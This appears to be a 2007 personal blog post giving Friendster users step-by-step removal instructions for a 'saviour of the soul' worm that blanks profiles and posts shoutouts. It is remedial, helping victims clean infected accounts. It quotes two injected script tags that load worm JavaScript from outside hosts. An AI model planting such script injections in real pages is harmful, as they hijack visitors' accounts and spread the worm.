mybabypiggy


Friendster blank profile, "saviour of the soul"

2007.08.14 8pm way to go, friendster again is bombard with hijacking.

To solve it:

  1. Login to your friendster page. Double check if its infected by going http://www.friendster.com/user.php

    if it appears blank and at the bottom there are some smilies
    "saviour of the soul",
    you can continue to the 2nd step

  2. Point your cursor to "My Profile"
  3. Edit Profile

  4. Customize

  5. Scroll down till the "Add Media" box and remove any code inside it.


    Then click Save.

    wait that is not the end yet!!!!
  6. Click "Home" at the top part navigation.
  7. Under "My Tools"
  8. Click "Post Shoutout"
  9. then "Delete Shout out"
    It's now done you can visit your own profile http://www.friendster.com/user.php

Hopefully that in future friendster.com can implment features such as image verifying to prevent scripts changing our profile or spamming the bulletin board without our knowledge. With this way friendster can reduce the server work load when the spamming gets worst from time to time.

****you must be wondering why I asked to remove all the codes right?

well the virus/spyware/torjan horse is hosted at a few server, NOT one server. Below are the various example code added in to your "Add Media" box

#x3c;/style>#x3c;script type="text/javascript" src="http://aka8383.110mb.com/saviourofthesoul . js">#x3c;/script>

#x3c;script defer type='text/javascript' src='http://www.cebusale.biz/community/install2/log/wormX . js'>#x3c;/script>

and it seem to be originated from Philippines.


just removing from #x3c;script ---till--------#x3c;/script> would be safe, if you have other stuff in your "Media box" like me =D.